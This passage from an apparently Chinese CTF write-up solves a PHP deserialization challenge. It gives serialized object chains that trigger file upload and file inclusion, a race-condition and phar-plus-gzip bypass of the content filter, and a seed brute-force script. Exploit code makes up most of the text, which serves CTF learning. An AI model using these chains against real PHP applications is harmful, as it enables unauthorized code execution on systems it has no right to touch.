class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;readflag = <span class="hljs-keyword">new</span> <span class="hljs-class"><span class="hljs-keyword">class</span> </span>&#123;<br>            <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>) </span>&#123;<br>                <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;called upload\n&quot;</span>;<br>            &#125;<br><br>            <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>) </span>&#123;<br>                <span class="hljs-title function_ invoke__">phpinfo</span>();<br>            &#125;<br><br>            <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">readflag</span>(<span class="hljs-params"></span>) </span>&#123;<br>                <span class="hljs-keyword">echo</span>(<span class="hljs-string">&quot;define readflag\n&quot;</span>);<br>                <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">readflag</span>(<span class="hljs-params"></span>)</span>&#123;<br>                    <span class="hljs-keyword">echo</span>(<span class="hljs-string">&quot;called readflag\n&quot;</span>);<br>                &#125;<br>            &#125;<br>        &#125;;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span>(<span class="hljs-string">&quot;called __destruct\n&quot;</span>);<br>        <span class="hljs-variable">$func</span> = <span class="hljs-variable language_">$this</span>-&gt;f;<br>        <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;filename&#x27;</span>] = <span class="hljs-variable language_">$this</span>-&gt;readflag;<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;key == <span class="hljs-string">&#x27;class&#x27;</span>) &#123;<br>            <span class="hljs-keyword">new</span> <span class="hljs-variable">$func</span>();<br>        &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;key == <span class="hljs-string">&#x27;func&#x27;</span>) &#123;<br>            <span class="hljs-variable">$func</span>();<span class="hljs-comment">//readflag();</span><br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-keyword">echo</span>(<span class="hljs-string">&quot;else\n&quot;</span>);<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>test类的构造函数中new了一个匿名类，匿名类的构造方法是一个文件上传，匿名类还有一个readflag方法，他定义了一个readflag函数，readflag函数会对上传的文件进行内容检测，然后include包含。</p>
<p>先来分析第一步，文件上传+触发readflag</p>
<p>想触发文件上传很简单，只要触发test类的构造方法就可以了，而触发readflag函数需要先调用匿名类的readflag方法，然后再调用readflag函数</p>
<p>我们只有两个地方能触发</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;key == <span class="hljs-string">&#x27;class&#x27;</span>) &#123;<br>    <span class="hljs-keyword">new</span> <span class="hljs-variable">$func</span>();<br>&#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;key == <span class="hljs-string">&#x27;func&#x27;</span>) &#123;<br>    <span class="hljs-variable">$func</span>();<br>&#125;<br></code></pre></td></tr></table></figure>



<p>如果我们想通过$func();的方式来调用类里的函数，需要用到php的数组</p>
<p>也就是，如果存在一个类A，类A有一个readflag方法，我们可以通过如下方式调用这个readflag方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$o</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">A</span>();<br><span class="hljs-variable">$func</span> = [<span class="hljs-variable">$o</span>,<span class="hljs-string">&quot;readflag&quot;</span>];<br><span class="hljs-variable">$func</span>();<br></code></pre></td></tr></table></figure>

<p>因为这题的匿名类是绑定到test类对象的readflag属性上的，我们就可以利用这个特性同时序列化多个对象来实现文件上传和包含</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$o1</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o1</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;f = <span class="hljs-string">&#x27;readflag&#x27;</span>;<br><br><span class="hljs-variable">$o2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o2</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o2</span>-&gt;f = [&amp;<span class="hljs-variable">$o1</span>-&gt;readflag,<span class="hljs-string">&#x27;readflag&#x27;</span>];<br><br><span class="hljs-variable">$o3</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o3</span>-&gt; key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt; f = [&amp;<span class="hljs-variable">$o1</span>,<span class="hljs-string">&#x27;__construct&#x27;</span>];<br><br><span class="hljs-keyword">echo</span>(<span class="hljs-title function_ invoke__">serialize</span>([<span class="hljs-variable">$o3</span>,<span class="hljs-variable">$o2</span>,<span class="hljs-variable">$o1</span>]);<br>     <span class="hljs-comment">//反序列化的时候，o3调用o1的构造方法，new一个匿名类，触发文件上传，o2调用匿名类的readflag方法定义了全局的readflag函数，o1调用全局的readflag函数，进行文件包含</span><br></code></pre></td></tr></table></figure>

<p>但是这样你运行一下会发现有问题</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251022102436027.png" srcset="/img/loading.gif" lazyload alt="image-20251022102436027"></p>
<p>匿名类是不能被序列化的</p>
<p>解决方法也很简单，可以在序列化的时候先把test类的方法删掉，因为方法不会被序列化，或者可以先把每个对象的readflag属性赋值为0，反正我们反序列化的时候会调用$o1的构造方法，readflag会被重新赋值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$o1</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o1</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;f = <span class="hljs-string">&#x27;readflag&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o2</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o2</span>-&gt;f = [&amp;<span class="hljs-variable">$o1</span>-&gt;readflag,<span class="hljs-string">&#x27;readflag&#x27;</span>];<br><span class="hljs-variable">$o2</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o3</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o3</span>-&gt; key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt; f = [&amp;<span class="hljs-variable">$o1</span>,<span class="hljs-string">&#x27;__construct&#x27;</span>];<br><span class="hljs-variable">$o3</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-keyword">echo</span>(<span class="hljs-title function_ invoke__">serialize</span>([<span class="hljs-variable">$o3</span>,<span class="hljs-variable">$o2</span>,<span class="hljs-variable">$o1</span>]);<br></code></pre></td></tr></table></figure>

<p>以上是第一种方法，下面介绍看到的另一种的思路</p>
<p>既然可以利用[类名，方法名]的方式调用类的方法，那么匿名类有没有类名呢，如果有的话是不是就可以直接调用而不依赖readflag属性了</p>
<p>php的get_declared_classes()函数可以获取到当前的所有类对象</p>
<p>打印一下就可以看到</p>
<pre><code class="hljs">[140] =&gt; mysqli_stmt
[141] =&gt; PharException
[142] =&gt; Phar
[143] =&gt; PharData
[144] =&gt; PharFileInfo
[145] =&gt; class@anonymousE:\qwb2025\ez_php\test.php:9$0
[146] =&gt; test
</code></pre>
<p>class@anonymousE:\qwb2025\ez_php\test.php:9$0就是匿名类的类名，分析一下他的组成</p>
<p>class@anonymous是固定的，这里有一个小坑，如果你编码一下再输出就会发现它的格式</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">class</span>%<span class="hljs-number">40</span>anonymous%<span class="hljs-number">00</span>E%<span class="hljs-number">3</span>A%<span class="hljs-number">5</span>Cqwb2025%<span class="hljs-number">5</span>Cez_php%<span class="hljs-number">5</span>Ctest.php%<span class="hljs-number">3</span>A9%<span class="hljs-number">240</span><br></code></pre></td></tr></table></figure>

<p>class@anonymous和路径之间有一个%00</p>
<p>最后的9是创建对象的代码的行号，$0是一个计数器</p>
<p><strong>注意</strong>：经测试，如果是php7.3后面不是行号加上这个计数器，而是一串16进制数字</p>
<p>那么我们尝试一下利用这个类名来调用方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$o1</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o1</span>-&gt;f = <span class="hljs-string">&#x27;test&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;key = <span class="hljs-string">&#x27;class&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o2</span>-&gt;f = [<span class="hljs-string">&quot;class@anonymous\0E:\qwb2025\\ez_php\\test.php:9<span class="hljs-subst">$0</span>&quot;</span>, <span class="hljs-string">&#x27;readflag&#x27;</span>];<br><span class="hljs-variable">$o2</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o2</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o3</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o3</span>-&gt;f = <span class="hljs-string">&#x27;readflag&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-keyword">echo</span>(<span class="hljs-title function_ invoke__">serialize</span>([<span class="hljs-variable">$obj1</span>, <span class="hljs-variable">$obj2</span>, <span class="hljs-variable">$obj3</span>]));<br></code></pre></td></tr></table></figure>

<p>这样也是可以的,但是注意要换成题目环境的匿名函数名，因为它的代码都在第一行，所以很容易得到（可以自己起个环境加个输出）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$o1</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o1</span>-&gt;f = <span class="hljs-string">&#x27;test&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;key = <span class="hljs-string">&#x27;class&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o2</span>-&gt;f = [<span class="hljs-string">&quot;class@anonymous\0/var/www/html/index.php(1) : eval()&#x27;d code:1<span class="hljs-subst">$0</span>&quot;</span>, <span class="hljs-string">&#x27;readflag&#x27;</span>];<br><span class="hljs-variable">$o2</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o2</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o3</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o3</span>-&gt;f = <span class="hljs-string">&#x27;readflag&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-keyword">echo</span>(<span class="hljs-title function_ invoke__">serialize</span>([<span class="hljs-variable">$obj1</span>, <span class="hljs-variable">$obj2</span>, <span class="hljs-variable">$obj3</span>]));<br></code></pre></td></tr></table></figure>

<p>第一步就解决了，下面分析如果绕过内容检测，也有两种思路</p>
<p><strong>思路一</strong>：</p>
<p>文件上传的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>) </span>&#123;<br>                <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>]) &amp;&amp; <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;error&#x27;</span>] == <span class="hljs-number">0</span>) &#123;<br>                    <span class="hljs-variable">$time</span> = <span class="hljs-title function_ invoke__">date</span>(<span class="hljs-string">&#x27;Hi&#x27;</span>);<br>                    <span class="hljs-variable">$filename</span> = <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;filename&#x27;</span>];<br>                    <span class="hljs-variable">$seed</span> = <span class="hljs-variable">$time</span> . <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$filename</span>);<br>                    <span class="hljs-title function_ invoke__">mt_srand</span>(<span class="hljs-variable">$seed</span>);<br><br>                    <span class="hljs-variable">$uploadDir</span> = <span class="hljs-string">&#x27;uploads/&#x27;</span>;<br>                    <span class="hljs-variable">$files</span> = <span class="hljs-title function_ invoke__">glob</span>(<span class="hljs-variable">$uploadDir</span> . <span class="hljs-string">&#x27;*&#x27;</span>);<br>                    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$files</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$file</span>) &#123;<br>                        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$file</span>)) <span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$file</span>);<br>                    &#125;<br><br>                    <span class="hljs-variable">$randomStr</span> = <span class="hljs-title function_ invoke__">generateRandomString</span>(<span class="hljs-number">8</span>);<br>                    <span class="hljs-variable">$newFilename</span> = <span class="hljs-variable">$time</span> . <span class="hljs-string">&#x27;.&#x27;</span> . <span class="hljs-variable">$randomStr</span> . <span class="hljs-string">&#x27;.jpg&#x27;</span>;<br>                    <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;file&#x27;</span>] = <span class="hljs-variable">$newFilename</span>;<br><br>                    <span class="hljs-variable">$uploadedFile</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];<br>                    <span class="hljs-variable">$uploadPath</span> = <span class="hljs-variable">$uploadDir</span> . <span class="hljs-variable">$newFilename</span>;<br><br>                    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&quot;cp &quot;</span> . <span class="hljs-variable">$uploadedFile</span> . <span class="hljs-string">&quot; &quot;</span> . <span class="hljs-variable">$uploadPath</span>)) &#123;<br>                        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;success upload!&quot;</span>;<br>                    &#125; <span class="hljs-keyword">else</span> &#123;<br>                        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;error&quot;</span>;<br><br>                    &#125;<br>                &#125;<br>            &#125;<br></code></pre></td></tr></table></figure>

<p>检测并include的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;file&#x27;</span>])) &#123;<br>                        <span class="hljs-variable">$file</span> = <span class="hljs-title function_ invoke__">basename</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;file&#x27;</span>]);<br>                        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/:\/\//&#x27;</span>, <span class="hljs-variable">$file</span>)) <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;error&quot;</span>);<br><br>                        <span class="hljs-variable">$file_content</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&quot;uploads/&quot;</span> . <span class="hljs-variable">$file</span>);<br>                        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/&lt;\?|\:\/\/|ph|\?\=/i&#x27;</span>, <span class="hljs-variable">$file_content</span>)) &#123;<br>                            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Illegal content detected in the file.&quot;</span>);<br>                        &#125;<br><br>                        <span class="hljs-keyword">include</span>(<span class="hljs-string">&quot;uploads/&quot;</span> . <span class="hljs-variable">$file</span>);<br></code></pre></td></tr></table></figure>

<p>在文件上传的时候会先删除uploads目录的文件，然后再cp到uploads目录</p>
<p>因为同一分钟类，文件名是相同的，那么我们就可以尝试条件竞争了</p>
<p>thread1上传文件 –&gt; thread1清空目录 –&gt; thread1写入文件 –&gt; thread2上传文件 –&gt; thread2清空目录 –&gt; thread1内容检测 –&gt; thread1检测通过 –&gt; thread2写入文件 –&gt; thread1文件包含</p>
<p><strong>思路二</strong>：phar+gzip压缩</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://fushuling.com/index.php/2025/07/30/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web/">https://fushuling.com/index.php/2025/07/30/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web/</a></p>
<p>phar非常灵活，只要你有phar文件头，并且你的文件名有.phar字符串（不需要在尾部），php就可以把这个文件当成phar解析，并且是可以压缩的，压缩之后就没有&lt;?php了，显然可以绕过内容检测，所以唯一的问题是怎么让文件名包含.phar</p>
<p>分析一下文件名的设置逻辑</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">generateRandomString</span>(<span class="hljs-params"><span class="hljs-variable">$length</span> = <span class="hljs-number">8</span></span>) </span>&#123;<br>    <span class="hljs-variable">$characters</span> = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span>;<br>    <span class="hljs-variable">$randomString</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; <span class="hljs-variable">$length</span>; <span class="hljs-variable">$i</span>++) &#123;<br>        <span class="hljs-variable">$r</span> = <span class="hljs-title function_ invoke__">rand</span>(<span class="hljs-number">0</span>, <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$characters</span>) - <span class="hljs-number">1</span>);<br>        <span class="hljs-variable">$randomString</span> .= <span class="hljs-variable">$characters</span>[<span class="hljs-variable">$r</span>];<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$randomString</span>;<br>&#125;<br><span class="hljs-variable">$time</span> = <span class="hljs-title function_ invoke__">date</span>(<span class="hljs-string">&#x27;Hi&#x27;</span>);<br><span class="hljs-variable">$filename</span> = <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;filename&#x27;</span>];<br><span class="hljs-variable">$seed</span> = <span class="hljs-variable">$time</span> . <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$filename</span>);<br><span class="hljs-title function_ invoke__">mt_srand</span>(<span class="hljs-variable">$seed</span>);<br><span class="hljs-variable">$randomStr</span> = <span class="hljs-title function_ invoke__">generateRandomString</span>(<span class="hljs-number">8</span>);<br><span class="hljs-variable">$newFilename</span> = <span class="hljs-variable">$time</span> . <span class="hljs-string">&#x27;.&#x27;</span> . <span class="hljs-variable">$randomStr</span> . <span class="hljs-string">&#x27;.jpg&#x27;</span>;<br><span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;file&#x27;</span>] = <span class="hljs-variable">$newFilename</span>;<br></code></pre></td></tr></table></figure>

<p>文件名是time.randomstr.jpg的格式</p>
<p>显然只需要让randomstr里面包含phar就行了，因为php的随机数是伪随机，这里的种子是我们可控的，所以我们可以找出哪个种子能生成包含phar的字符串</p>
<p>种子的构成是当前小时和分钟数+转成int之后全局的filename变量</p>
<p>而全局的filename变量的值是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;filename&#x27;</span>] = <span class="hljs-variable language_">$this</span>-&gt;readflag;<br></code></pre></td></tr></table></figure>

<p>readflag属性又是可控的</p>
<p>所以我们只需要将爆出来的种子传给readflag，在析构的时候就可以传到filename变量，这里可以写一个非常简单的脚本来爆破一下,直接借鉴一下大佬的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFilename</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-title function_ invoke__">date_default_timezone_set</span>(<span class="hljs-string">&#x27;Asia/Shanghai&#x27;</span>);<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">generateRandomString</span>(<span class="hljs-params"><span class="hljs-variable">$length</span> = <span class="hljs-number">8</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable">$characters</span> = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span>;<br>        <span class="hljs-variable">$randomString</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br>        <span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; <span class="hljs-variable">$length</span>; <span class="hljs-variable">$i</span>++) &#123;<br>            <span class="hljs-variable">$r</span> = <span class="hljs-title function_ invoke__">mt_rand</span>(<span class="hljs-number">0</span>, <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$characters</span>) - <span class="hljs-number">1</span>);<br>            <span class="hljs-variable">$randomString</span> .= <span class="hljs-variable">$characters</span>[<span class="hljs-variable">$r</span>];<br>        &#125;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$randomString</span>;<br>    &#125;<br>    <span class="hljs-variable">$time</span> = <span class="hljs-title function_ invoke__">date</span>(<span class="hljs-string">&#x27;Hi&#x27;</span>);<br>    <span class="hljs-keyword">for</span> (<span class="hljs-variable">$filename</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$filename</span> &lt; <span class="hljs-number">2000000000</span>; <span class="hljs-variable">$filename</span>++) &#123;<br>        <span class="hljs-variable">$seed</span> = <span class="hljs-variable">$time</span> . <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$filename</span>);<br>        <span class="hljs-title function_ invoke__">mt_srand</span>(<span class="hljs-variable">$seed</span>);<br>        <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">generateRandomString</span>(<span class="hljs-number">8</span>);<br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$s</span>, <span class="hljs-string">&#x27;phar&#x27;</span>) === <span class="hljs-number">0</span>) &#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;found: filename=<span class="hljs-subst">$filename</span> seed=<span class="hljs-subst">$seed</span> =&gt; <span class="hljs-subst">$s</span>\n&quot;</span>;<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable">$filename</span>;<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">echo</span>(<span class="hljs-title function_ invoke__">getFilename</span>());<br><br><br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>



<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">found: <span class="hljs-attribute">filename</span>=18112 <span class="hljs-attribute">seed</span>=110718112 =&gt; pharktae<br>18112<br></code></pre></td></tr></table></figure>

<p>注意设置时区，以我当前的时间为例，爆出来是18112，于是生成序列化数据的时候</p>
